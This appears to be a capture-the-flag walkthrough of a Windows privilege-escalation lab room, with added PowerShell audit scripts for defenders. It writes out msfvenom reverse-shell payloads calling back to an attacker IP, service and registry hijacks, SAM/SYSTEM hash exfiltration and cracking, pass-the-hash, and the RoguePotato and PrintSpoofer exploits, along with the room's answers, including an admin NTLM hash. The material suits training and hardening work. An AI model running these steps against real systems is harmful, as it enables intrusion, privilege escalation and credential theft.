Windows PrivEsc

This guide contains the answers, and the steps needed to reach them, for the Windows PrivEsc room.

Deploy a Vulnerable Windows VM

Username: user

Password: password321

We can connect to the machine with various tools. I use Remmina in these examples, but you can also use xfreerdp.

Remmina Remote Connection

xfreerdp /u:user /p:password321 /cert:ignore /v:10.10.145.241

Generate a Reverse Shell Executable

Generate a reverse shell executable and transfer it to the Windows VM. Check that it works!

First we create a reverse shell executable using msfvenom. We specify the attack machine IP and port, the output format and the file name.

msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.18.78.136 LPORT=1337 -f exe -o reverse.exe

Msf Venom Payload

Now we must transfer this file over to our target machine. In this room we can use impacket's SMB server for that. Don't forget the dot at the end: it is the directory being shared.

sudo python3 /usr/share/doc/python3-impacket/examples/smbserver.py kali .

SMB Server

Now we can copy over the file from our machine.

copy \\10.18.78.136\kali\reverse.exe "C:\PrivEsc\reverse.exe"

Copy Shell

Then we set up a listener on our machine using Netcat.

nc -nlvp 1337

Finally we can execute the reverse shell from our target machine.

Netcat Connection

Service Exploits - Insecure Service Permissions

Now we exploit insecure service permissions to execute our reverse shell.

  1. What is the original BINARY_PATH_NAME of the daclsvc service?

First we check the permissions that are set for the daclsvc service.

<Path to>\accesschk.exe /accepteula -uwcqv user daclsvc

Service Permissions

It looks like our user has permission to change the service configuration. Querying the service shows that it runs as SYSTEM. The next image also contains the answer to our question.

sc qc daclsvc

Service Configuration

Next we modify the service executable path to reflect our reverse shell.

sc config daclsvc binpath= "\"<Path to>\reverse.exe\""

Change Configuration

Then we set up a listener on our machine using Netcat.

nc -nlvp 1337

Lastly we start the service.

net start daclsvc

Elevated Shell

Answer: C:\Program Files\DACL Service\daclservice.exe

Service Exploits - Unquoted Service Path

In this task we will use the unquotedsvc service to get our reverse shell.

  1. What is the BINARY_PATH_NAME of the unquotedsvc service?

We first query the service configuration to see if it runs as SYSTEM.

sc qc unquotedsvc

Service Configuration

Then we look for the available permissions for the folder it is located in.

<Path to>\accesschk.exe /accepteula -uwdq "C:\Program Files\Unquoted Path Service\"

Path Permissions

Then we copy the reverse shell into this folder.

copy C:\PrivEsc\reverse.exe "C:\Program Files\Unquoted Path Service\Common.exe"

Copy Shell

We must now set up a listener on our machine.

nc -nlvp 1337

Lastly, we can start the service.

net start unquotedsvc

Reverse Connection

Answer: C:\Program Files\Unquoted Path Service\Common Files\unquotedpathservice.exe

Service Exploits - Weak Registry Permissions

In this task we will exploit a weak registry permission to execute our reverse shell.

Read and follow along with the above.

We first query the service configuration for the regsvc service.

sc qc regsvc

Service Configuration

Then we check for any write permissions we may have.

C:\PrivEsc\accesschk.exe /accepteula -uvwqk HKLM\System\CurrentControlSet\Services\regsvc

Access Check

Looks like the service runs as SYSTEM and we have write access to its registry entries. Let's change them so the service runs our reverse shell instead.

reg add HKLM\SYSTEM\CurrentControlSet\services\regsvc /v ImagePath /t REG_EXPAND_SZ /d C:\PrivEsc\reverse.exe /f

Registry Modification

Then we can start a listener on our machine.

nc -nlvp 1337

And lastly we start the service to execute our reverse shell.

net start regsvc

Reverse Shell Connection

Service Exploits - Insecure Service Executables

In this task we will exploit a service executable with insecure file permissions to run our reverse shell.

Read and follow along with the above.

First we query the service configuration again to see what the service runs as.

sc qc filepermsvc

Service Configuration

Then we check for the write permissions we have on the binary.

C:\PrivEsc\accesschk.exe /accepteula -quvw "C:\Program Files\File Permissions Service\filepermservice.exe"

Access Check

Now we must copy over our reverse shell to replace the legit executable.

copy C:\PrivEsc\reverse.exe "C:\Program Files\File Permissions Service\filepermservice.exe" /Y

Copy Shell

Now we set up a listener and start the service.

nc -nlvp 1337
net start filepermsvc

Remote Connection
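As an added defensive check that is not part of the room or this writeup, the following PowerShell script audits every service for the four weaknesses walked through above: unquoted paths containing spaces, a binary or binary folder writable by the current user, and a writable service registry key. The function and variable names are my own; it needs only a current PowerShell on the host and runs as a normal user.

```powershell
# Added audit (not from the room): flag services with the weaknesses used in the four tasks above.
# SIDs of the current user and its groups decide which ACEs apply to us.
$MySids = @([System.Security.Principal.WindowsIdentity]::GetCurrent().User) +
          @([System.Security.Principal.WindowsIdentity]::GetCurrent().Groups)

function Test-WritableByCurrentUser {
    # $true if an Allow ACE for one of our SIDs grants write on a file, folder or registry key.
    # Deny ACEs are not evaluated, so treat a hit as "confirm with accesschk", not as proof.
    param([string]$Path)
    $acl = Get-Acl -Path $Path -ErrorAction SilentlyContinue
    if (-not $acl) { return $false }
    foreach ($ace in $acl.Access) {
        if ($ace.AccessControlType -ne 'Allow') { continue }
        try { $sid = $ace.IdentityReference.Translate([System.Security.Principal.SecurityIdentifier]) } catch { continue }
        if ($MySids -notcontains $sid) { continue }
        # Files/folders carry FileSystemRights, keys carry RegistryRights; the other property is $null.
        $rights = [string]$ace.FileSystemRights + [string]$ace.RegistryRights
        if ($rights -match 'Write|Modify|FullControl|SetValue|ChangePermissions') { return $true }
    }
    return $false
}

function Test-UnquotedServicePath {
    # Exploitable only when the path is unquoted AND the part up to .exe contains a space.
    param([string]$ImagePath)
    if (-not $ImagePath -or $ImagePath.StartsWith('"')) { return $false }
    $m = [regex]::Match($ImagePath, '^(.*?\.exe)', 'IgnoreCase')
    return ($m.Success -and $m.Groups[1].Value.Contains(' '))
}

function Invoke-ServiceAudit {
    foreach ($svc in Get-CimInstance -ClassName Win32_Service) {
        $path = [string]$svc.PathName
        $exe  = [regex]::Match($path, '^"?(.*?\.exe)', 'IgnoreCase').Groups[1].Value
        $findings = @()
        if (Test-UnquotedServicePath $path) { $findings += 'unquoted path with spaces' }
        if ($exe -and (Test-WritableByCurrentUser $exe)) { $findings += 'binary writable' }
        if ($exe -and (Test-WritableByCurrentUser (Split-Path -Parent $exe))) { $findings += 'binary folder writable' }
        if (Test-WritableByCurrentUser "HKLM:\SYSTEM\CurrentControlSet\Services\$($svc.Name)") { $findings += 'ImagePath key writable' }
        if ($findings) {
            [pscustomobject]@{ Service = $svc.Name; RunsAs = $svc.StartName; Path = $path; Findings = ($findings -join '; ') }
        }
    }
}

# The service object's own DACL (the daclsvc case) is not exposed by Get-Acl; keep using
# accesschk -c or 'sc sdshow <name>' for that check.
Invoke-ServiceAudit | Format-Table -AutoSize -Wrap
```

Any service reported with RunsAs = LocalSystem and a finding is exactly the combination the four tasks above rely on; fixing it means quoting the path, or tightening the ACL on the binary, folder or key to Administrators and SYSTEM only.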

Registry - AutoRuns

In this task we will exploit a writable AutoRun program, an executable launched from the Run registry key whenever a user logs on, to run our reverse shell.

Read and follow along with the above.

We first query the registry keys to find the correct executable.

reg query HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run

Registry Configuration

Next we check the permissions we have on that executable.

C:\PrivEsc\accesschk.exe /accepteula -wvu "C:\Program Files\Autorun Program\program.exe"

Access Check

Since we have write access, we can copy the shell over into this folder.

copy C:\PrivEsc\reverse.exe "C:\Program Files\Autorun Program\program.exe" /Y

Copy Shell

We now set up a listener and wait for the reverse shell to execute. For this we need to restart (not terminate) the VM and log into it via RDP once more.

nc -nlvp 1337

Reverse Connection

Registry - AlwaysInstallElevated

In this task we will exploit the fact that, when the AlwaysInstallElevated policy is set, MSI packages are installed with elevated privileges.

Read and follow along with the above.

As before, we first query the registry related to this exploit to see if it is enabled (denoted by a 1).

reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated

Query Register

Now we must create a payload to send to the machine, which we can install to get a reverse shell with elevated privileges. We do this with msfvenom again, but this time we make an MSI file. As before, we must specify a port and our own IP address.

msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.18.78.136 LPORT=1337 -f msi -o reverse.msi

Reverse Shell

Next, we can use the SMB server from before to transfer the file to the machine, or set up a new one.

On our machine:

sudo python3 /usr/share/doc/python3-impacket/examples/smbserver.py kali .

On the target machine:

copy \\10.18.78.136\kali\reverse.msi "C:\PrivEsc\reverse.msi"

Copy File

The last step is to setup a listener on the specified port.

nc -nlvp 1337

All that is left to do now is to execute the installer and wait for the connection to be made.

msiexec /quiet /qn /i C:\PrivEsc\reverse.msi

Reverse Connection

Passwords - Registry

In this task we will search the registry for any keys related to credentials. Unfortunately, as stated in the description, the password was not saved in the registry for me. So I had to use the supplied hint. However, I did perform all necessary steps that would have otherwise granted me the password.

  1. What was the admin password you found in the registry?

To search the registry for a specific keyword, we can use the following command:

reg query /f password /t REG_SZ

Search Registry

Since I couldn't find anything, I used the specific search string to directly query the necessary entry.

reg query "HKLM\Software\Microsoft\Windows NT\CurrentVersion\winlogon"

Query Registry

Unfortunately, I couldn't find the password here. So I used the supplied hint to create a connection to the target machine from our machine.

winexe -U 'admin%password123' //10.10.6.194 cmd.exe

Remote Shell Connection

Answer: password123

Passwords - Saved Creds

In this task we will exploit the fact that credentials are saved on the machine itself.

Read and follow along with the above.

For this question we will use cmdkey to get more info on the stored credentials. To list all stored credentials we can use:

cmdkey /list

Saved Credentials

Now we can run the reverse shell as we did before. This time, however, it will be executed as a user with elevated privileges.

runas /savecred /user:admin C:\PrivEsc\reverse.exe

Elevated Reverse Connection

Passwords - Security Account Manager (SAM)

The SAM and SYSTEM files store the user credential hashes. If they are insecurely backed up, we might be able to copy the backups and dump the hashes.

  1. What is the NTLM hash of the admin user?

First, set up an SMB server on our machine if one is not already running.

sudo python3 /usr/share/doc/python3-impacket/examples/smbserver.py kali .

SMB Server

Looking at the directory, we can indeed see the two backup files there.

Backup Files

Copy them to the attacking machine.

copy C:\Windows\Repair\SAM \\10.18.78.136\kali\SAM
copy C:\Windows\Repair\SYSTEM \\10.18.78.136\kali\SYSTEM

Copy Files

Use creddump7 to dump the hashes from these files using:

python3 /usr/share/creddump7/pwdump.py SYSTEM SAM

User Hashes

To find the passwords that belong to the hashes, we can put them in a file and use hashcat to crack them. For this part only the NTLM part of each hash is needed.

hashcat -m 1000 privesc.hash /usr/share/wordlists/rockyou.txt

Cracked Passwords

Now we can log into the machine with the acquired credentials.

Admin Login

Answer: a9fdfa038c4b75ebc76dc855dd74f0da

Passwords - Passing the Hash

Like winexe, pth-winexe gives us a shell on the machine. The difference is that it authenticates with only the NTLM hash instead of the password.

Read and follow along with the above.

We use a similar command as with winexe. Here we must supply both the LM and the NTLM part of the hash.

pth-winexe -U 'admin%aad3b435b51404eeaad3b435b51404ee:a9fdfa038c4b75ebc76dc855dd74f0da' //10.10.235.28 cmd.exe

Remote Connection
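From the defender's side, the following added PowerShell check (my own code, not part of the room or this writeup) looks for the three credential sources used in the Passwords tasks above: a Winlogon DefaultPassword, Credential Manager entries that runas /savecred can use, and SAM/SYSTEM hive copies readable by a non-admin. It assumes cmdkey's usual Target/Type/User listing layout, and adds the RegBack folder as a second hive-backup location beyond the Repair folder the room uses.

```powershell
# Added check (not from the room): which of the credential leaks from the Passwords tasks exist on this host?
# Run as an ordinary user; anything reported is reachable by that user.
# Assumption: cmdkey /list prints one "Target:" line followed by "Type:" and "User:" lines per entry.
function Get-CredentialExposure {
    # 1. Winlogon autologon: a plaintext DefaultPassword here is readable by every local user.
    $wl = Get-ItemProperty -Path 'HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon' -ErrorAction SilentlyContinue
    if ($wl.DefaultPassword) {
        [pscustomobject]@{ Source = 'Winlogon'; Detail = "DefaultPassword set for $($wl.DefaultUserName)"; Fix = 'remove DefaultPassword, disable AutoAdminLogon' }
    }
    # 2. Credential Manager entries: each one is usable with runas /savecred without knowing the password.
    $target = $null
    foreach ($line in (cmdkey /list 2>$null)) {
        if ($line -match '^\s*Target:\s*(.+)$') { $target = $Matches[1].Trim() }
        elseif ($line -match '^\s*User:\s*(.+)$' -and $target) {
            [pscustomobject]@{ Source = 'cmdkey'; Detail = "$target -> $($Matches[1].Trim())"; Fix = 'remove with cmdkey /delete' }
            $target = $null
        }
    }
    # 3. Hive backups readable by a non-admin: offline SAM + SYSTEM is enough to recover the NTLM hashes.
    foreach ($hive in 'SAM', 'SYSTEM') {
        foreach ($dir in "$env:SystemRoot\Repair", "$env:SystemRoot\System32\config\RegBack") {
            $p = Join-Path $dir $hive
            if (-not (Test-Path -LiteralPath $p)) { continue }
            try { $s = [System.IO.File]::OpenRead($p); $s.Dispose(); $readable = $true } catch { $readable = $false }
            if ($readable) {
                [pscustomobject]@{ Source = 'Hive backup'; Detail = "$p readable by current user"; Fix = 'restrict ACL to Administrators/SYSTEM or delete the copy' }
            }
        }
    }
}
Get-CredentialExposure | Format-Table -AutoSize -Wrap
```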

Scheduled Tasks

In this task we will abuse a scheduled task whose script has overly permissive file permissions.

Read and follow along with the above.

We can look at the script using:

type C:\DevTools\CleanUp.ps1

Or by opening it from the GUI.

Scripts

We can check our permission regarding this file with accesschk again.

accesschk /accepteula -quvw user C:\DevTools\CleanUp.ps1

Permissions

Looks like we have write permission for this script. We can modify it through the GUI or CLI.

echo C:\PrivEsc\reverse.exe >> C:\DevTools\CleanUp.ps1

Modify Scripts

After modifying the script, we wait for the connection.

Reverse Connection

Insecure GUI Apps

In this task we will use a GUI app that runs with elevated privileges to gain an elevated shell.

Read and follow along with the above.

Using the paint shortcut on the desktop we open Paint as an admin user. From the shortcut target, we can see that it uses the same technique as task 10 (saved creds).

GUI Shortcut

After opening the file we can use Task Manager to check its user.

Task Manager

This can also be done with the CLI.

tasklist /V | findstr mspaint.exe

Now we can get an elevated shell by opening a file in Paint and typing the following:

file:\C:\Windows\system32\cmd.exe

Open CMD

Elevated Shell

Startup Apps

In this task we will exploit the privileges that startup apps receive when they are run from an admin logon.

Read and follow along with the above.

We are first going to check the permissions we have for the startup folder using accesschk.exe.

C:\PrivEsc\accesschk.exe /accepteula -d "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp"

Checking Permissions

Looks like we have write permissions. Now we use the provided script and our uploaded reverse shell to create a startup shortcut that launches the reverse shell with admin privileges.

cscript C:\PrivEsc\CreateShortcut.vbs

Create Shortcut

Then we set up a listener on our machine:

nc -nlvp 1337

Lastly, we log into the target machine with our admin credentials to simulate an admin logon. I am using Remmina for this, but you can also use rdesktop.

Admin Shell

rdesktop -u admin 10.10.20.33
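As an added audit (my own code, not part of the room or this writeup), the script below checks the auto-start locations abused in the AutoRuns, AlwaysInstallElevated, Scheduled Tasks and Startup Apps tasks from the defender's side. It assumes Windows 8/Server 2012 or later for Get-ScheduledTask; write access is probed by opening files for write and creating a temporary file in folders rather than by reading ACLs, so a currently running executable reports as not writable and should be checked with accesschk instead.

```powershell
# Added audit (not from the room) of the auto-start locations used in the AutoRuns, AlwaysInstallElevated,
# Scheduled Tasks and Startup Apps tasks. Write access is probed, not read from ACLs: a file is writable
# if it opens for write (a running .exe is locked and reports $false), a folder if a temp file can be created.
function Test-FileWritable([string]$Path) {
    try { $s = [System.IO.File]::Open($Path, 'Open', 'Write', 'ReadWrite'); $s.Dispose(); $true } catch { $false }
}
function Test-DirWritable([string]$Dir) {
    try { $f = New-Item -Path $Dir -Name ("acl-probe-" + [guid]::NewGuid()) -ItemType File -ErrorAction Stop
          Remove-Item -LiteralPath $f.FullName -Force; $true } catch { $false }
}
function Get-FirstPath([string]$CommandLine) {
    # First drive-rooted path in a command line, e.g. the script in: powershell.exe -File C:\DevTools\CleanUp.ps1
    $m = [regex]::Match([Environment]::ExpandEnvironmentVariables($CommandLine), '"([A-Za-z]:\\[^"]+)"|([A-Za-z]:\\\S+)')
    if ($m.Success) { if ($m.Groups[1].Success) { $m.Groups[1].Value } else { $m.Groups[2].Value } }
}
function Invoke-AutostartAudit {
    # 1. Run keys: each entry runs as whoever logs on, administrators included.
    foreach ($hive in 'HKLM', 'HKCU') {
        $key = "${hive}:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run"
        $props = Get-ItemProperty -Path $key -ErrorAction SilentlyContinue
        foreach ($p in @($props.PSObject.Properties | Where-Object { $_.Name -notmatch '^PS' })) {
            $target = Get-FirstPath ([string]$p.Value)
            if ($target -and (Test-FileWritable $target)) {
                [pscustomobject]@{ Location = "$key\$($p.Name)"; Target = $target; Issue = 'target writable by current user' }
            }
        }
    }
    # 2. All-users Startup folder: writable means any user can plant a shortcut that runs at every logon.
    $startup = "$env:ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp"
    if (Test-DirWritable $startup) { [pscustomobject]@{ Location = $startup; Target = ''; Issue = 'folder writable by current user' } }
    # 3. AlwaysInstallElevated only takes effect when BOTH the HKCU and HKLM values are 1.
    $aie = foreach ($hive in 'HKCU', 'HKLM') {
        (Get-ItemProperty -Path "${hive}:\SOFTWARE\Policies\Microsoft\Windows\Installer" -Name AlwaysInstallElevated -ErrorAction SilentlyContinue).AlwaysInstallElevated
    }
    if (@($aie | Where-Object { $_ -eq 1 }).Count -eq 2) { [pscustomobject]@{ Location = 'AlwaysInstallElevated'; Target = ''; Issue = 'enabled in HKCU and HKLM' } }
    # 4. Scheduled tasks whose executable or script argument we can modify.
    foreach ($t in Get-ScheduledTask -ErrorAction SilentlyContinue) {
        foreach ($a in $t.Actions) {
            foreach ($cand in @([string]$a.Execute, [string]$a.Arguments)) {
                $target = Get-FirstPath $cand
                if ($target -and (Test-FileWritable $target)) {
                    [pscustomobject]@{ Location = "Task $($t.TaskPath)$($t.TaskName) (runs as $($t.Principal.UserId))"; Target = $target; Issue = 'action file writable by current user' }
                }
            }
        }
    }
}
Invoke-AutostartAudit | Format-Table -AutoSize -Wrap
```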

Token Impersonation - Rogue Potato

In this task we will use the RoguePotato exploit to gain a SYSTEM shell.

We must first set up a forwarder on our attack machine using socat.

sudo socat tcp-listen:135,reuseaddr,fork tcp:10.10.20.33:9999

Socat Forwarder

We then log into the machine with an admin account and use PsExec to simulate a service account shell. We create it with:

C:\PrivEsc\PSExec64.exe -i -u "nt authority\local service" C:\PrivEsc\reverse.exe

Create Service Shell

Before that, we must set up a listener on our machine.

nc -nlvp 1337

Service Connection

In this shell we can now use the RoguePotato exploit to gain a SYSTEM shell.

C:\PrivEsc\RoguePotato.exe -r 10.18.78.136 -e "C:\PrivEsc\reverse.exe" -l 9999

Create System Shell

Again, set up a listener before executing that command:

nc -nlvp 1337

System Shell

  1. Name one user privilege that allows this exploit to work.

I found this information on the following site. Otherwise, just Google it.

Answer: SeImpersonatePrivilege

  1. Name the other user privilege that allows this exploit to work.

Same as the previous question.

Answer: SeAssignPrimaryTokenPrivilege

Token Impersonation - PrintSpoofer

In this task we will use the PrintSpoofer exploit to gain a SYSTEM shell.

Read and follow along with the above.

First we set up a listener on our machine with:

nc -nlvp 1337

Then we log into the machine with our admin credentials so that we can simulate a service account shell with the following command (it uses our reverse shell executable):

C:\PrivEsc\PSExec64.exe -i -u "nt authority\local service" C:\PrivEsc\reverse.exe

Create Service Shell

Service Connection

Now we set up another listener on our machine.

nc -nlvp 1337

Then in the acquired Service shell we can use the PrintSpoofer exploit to get a SYSTEM shell.

C:\PrivEsc\PrintSpoofer.exe -c "C:\PrivEsc\reverse.exe" -i 10.18.78.136 1337

Create System Shell

System Connection

Privilege Escalation Scripts

In this task we have several other tools which we are free to use.

Tools included:

  - winPEASany.exe
  - Seatbelt.exe
  - PowerUp.ps1
  - SharpUp.exe

Experiment with all four tools, running them with different options. Do all of them identify the techniques used in this room?

WinPEAS can be used to find out all sorts of information on our target machine. We run it with:

.\winPEASany.exe -quiet > output.txt

Win Peas Command

We get a long list of checks. Among them we can see some of the weaknesses we used in previous tasks, such as the SAM and SYSTEM backup files or the AlwaysInstallElevated registry key.

Win Peas Results 1

Win Peas Results 2

Seatbelt performs a number of security oriented host-survey "safety checks" relevant from both offensive and defensive security perspectives. We can run it using various commands:

Seatbelt.exe user
Seatbelt.exe system
Seatbelt.exe all

Seatbelt Command

Again we find similar things as we found before with saved credentials.

Seatbelt

PowerUp aims to be a clearinghouse of common Windows privilege escalation vectors that rely on misconfigurations. After importing the module, we can run it using:

. .\PowerUp.ps1
Invoke-AllChecks

Power Up

We see it lists some services we can abuse and their respective command to do so.

SharpUp is a C# port of various PowerUp functionality. We can run the executable with:

SharpUp.exe audit

Sharp Up